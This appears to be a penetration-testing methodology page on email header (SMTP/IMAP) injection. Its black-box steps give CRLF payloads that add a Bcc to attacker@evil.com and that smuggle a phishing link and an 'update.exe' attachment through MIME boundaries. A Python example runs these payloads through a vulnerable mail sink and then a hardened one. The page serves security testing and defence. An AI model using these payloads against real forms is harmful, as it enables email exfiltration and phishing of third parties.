IMAP SMTP Injection
Check List
Methodology
Black Box
Email field
Navigate to email-sending features such as Contact Us, Support, Feedback, Send Message, or Invite User forms. Typical paths are /contact, /support, /feedback, /send-email, or /ask.
Fill in the input fields (email, name, subject, message) with normal values, then intercept the request in Burp Suite.
Locate the user-controlled fields in the intercepted request (for example email=gupta@gmail.com, name=Bless, message=Hello).
Inject CRLF (%0d%0a URL-encoded, or a raw \r\n) into any field to terminate the current header and start a new one. The email field is the usual target, because it normally lands in a From, Reply-To or To header.
email=gupta@gmail.com%0d%0abcc:attacker@evil.com
Forward the modified request and check the attacker-controlled inbox (attacker@evil.com). If a copy of the email arrives there, the injection is confirmed. Inspect the raw headers of the received mail: an injected Cc shows up as a header, while a Bcc is normally stripped by the sending MTA, so for Bcc the delivery itself is the evidence.
Repeat the same test on similar endpoints such as /notify, /share, /invite, /ticket, or /api/mail.
Reflected In The Confirmation Email or Response
Navigate to any email-sending form such as Contact Us, Support, Feedback, Get in Touch, Send Message, or Report Issue
Fill in the form with normal values, then intercept the request using Burp Suite.
Capture the full POST/GET request to /contact or /send.
Check whether the email field is reflected in the confirmation email or in the response. If it is, proceed to injection testing.
Inject CRLF + BCC into the email field to receive a blind copy:
email=victim@company.com%0d%0abcc:attacker@evil.com
Forward the request and check attacker@evil.com. If the email arrives there, the injection is confirmed.
Try injecting an attachment through MIME boundaries. The injected Content-Type header declares a multipart body, the empty line (%0d%0a%0d%0a) closes the header block so the application's remaining headers and body are no longer parsed as headers, and the boundaries then carry a phishing text part plus a file part. This only works when the injected Content-Type is the one the receiving client honours, so it must land before any Content-Type the application sets itself:
email=victim@company.com%0d%0a
content-type:multipart/mixed; boundary="XYZ"%0d%0a
%0d%0a--XYZ%0d%0a
content-type:text/plain%0d%0a
Your account needs verification: https://evil.com%0d%0a
--XYZ%0d%0a
content-type:application/octet-stream; name="update.exe"%0d%0a
content-disposition:attachment; filename="update.exe"%0d%0a
[base64-encoded payload or dummy data]%0d%0a
--XYZ--
White Box
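The following is an added example, not code from the original page: a minimal mail-composing sink that pastes form fields into raw SMTP headers (the pattern behind both black-box procedures above), the BCC and MIME payloads from those steps pushed through it after URL-decoding, a parser showing what the recipient's mail client would actually see, and the same sink hardened. Assumptions: the form's email field is copied into a Reply-To header, the noreply@example.com and support@example.com addresses are placeholders, and the attachment body is the dummy base64 string "ZHVtbXk=" ("dummy") rather than a real file.

```python
"""Added example (not code from the original page): a header-concatenating
mail sink, the two payloads from the black-box steps fed through it, a parser
that shows what arrives, and the hardened version of the sink.

Assumptions: the email field is copied into a Reply-To header; the addresses
below are placeholders; the attachment body is the dummy base64 "ZHVtbXk=".
"""
from email import message_from_string
from email.message import EmailMessage
from urllib.parse import unquote

FROM_ADDR = "noreply@example.com"   # assumed placeholder
TO_ADDR = "support@example.com"     # assumed placeholder

# Payloads exactly as they would be typed into the intercepted request.
BCC_PAYLOAD = "victim@company.com%0d%0abcc:attacker@evil.com"
MIME_PAYLOAD = (
    "victim@company.com%0d%0a"
    'content-type:multipart/mixed; boundary="XYZ"%0d%0a'
    "%0d%0a--XYZ%0d%0a"
    "content-type:text/plain%0d%0a"
    "Your account needs verification: https://evil.com%0d%0a"
    "--XYZ%0d%0a"
    'content-type:application/octet-stream; name="update.exe"%0d%0a'
    'content-disposition:attachment; filename="update.exe"%0d%0a'
    "ZHVtbXk=%0d%0a"          # constructed dummy data instead of a real file
    "--XYZ--"
)


def decode_form_value(value):
    """What the web framework hands the application after URL-decoding:
    %0d%0a has become a real CR LF pair by the time it reaches the sink."""
    return unquote(value)


def build_message_vulnerable(form_email, name, message):
    """Vulnerable sink: every field is pasted into the header block verbatim,
    so a CR LF inside a field ends that header and starts an attacker one."""
    return (
        f"From: {FROM_ADDR}\r\n"
        f"To: {TO_ADDR}\r\n"
        f"Reply-To: {form_email}\r\n"
        f"Subject: Contact form from {name}\r\n"
        "\r\n"
        f"{message}\r\n"
    )


INTENDED_HEADERS = {"from", "to", "reply-to", "subject"}


def smuggled_headers(raw):
    """Parse the outgoing message the way an MTA/MUA would and return every
    top-level header the vulnerable sink never meant to emit."""
    msg = message_from_string(raw)
    return [(k.lower(), v) for k, v in msg.items()
            if k.lower() not in INTENDED_HEADERS]


def smuggled_attachments(raw):
    """Filenames of any MIME parts that arrived via an injected boundary."""
    msg = message_from_string(raw)
    if not msg.is_multipart():
        return []
    return [p.get_filename() for p in msg.get_payload() if p.get_filename()]


def is_header_safe(value):
    """Server-side check: a header value may never contain CR, LF or NUL."""
    return not any(c in value for c in "\r\n\x00")


def build_message_hardened(form_email, name, message):
    """Hardened sink: reject line breaks in every header-bound field, then
    let the email library fold and encode headers instead of string-pasting."""
    for field in (form_email, name):
        if not is_header_safe(field):
            raise ValueError("header injection attempt rejected")
    msg = EmailMessage()
    msg["From"] = FROM_ADDR
    msg["To"] = TO_ADDR
    msg["Reply-To"] = form_email
    msg["Subject"] = f"Contact form from {name}"
    msg.set_content(message)
    return msg.as_string()


def hardened_rejects(form_email):
    """True if the hardened sink refuses to build a message for this value."""
    try:
        build_message_hardened(form_email, "Bless", "Hello")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, payload in (("BCC", BCC_PAYLOAD), ("MIME", MIME_PAYLOAD)):
        decoded = decode_form_value(payload)
        raw = build_message_vulnerable(decoded, "Bless", "Hello")
        print(label, "smuggled headers:", smuggled_headers(raw))
        print(label, "smuggled attachments:", smuggled_attachments(raw))
        print(label, "hardened sink rejects:", hardened_rejects(decoded))
```

Running the script shows the BCC payload producing a bcc header the sink never wrote, and the MIME payload turning the whole message into multipart/mixed with an update.exe part; the application's own Subject header ends up after the closing boundary, which the parser discards as epilogue. The hardened sink refuses both payloads before any mail is built: rejecting CR, LF and NUL in header-bound fields is the control, and using a library that serialises headers (rather than string concatenation) is the defence in depth.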
Cheat Sheet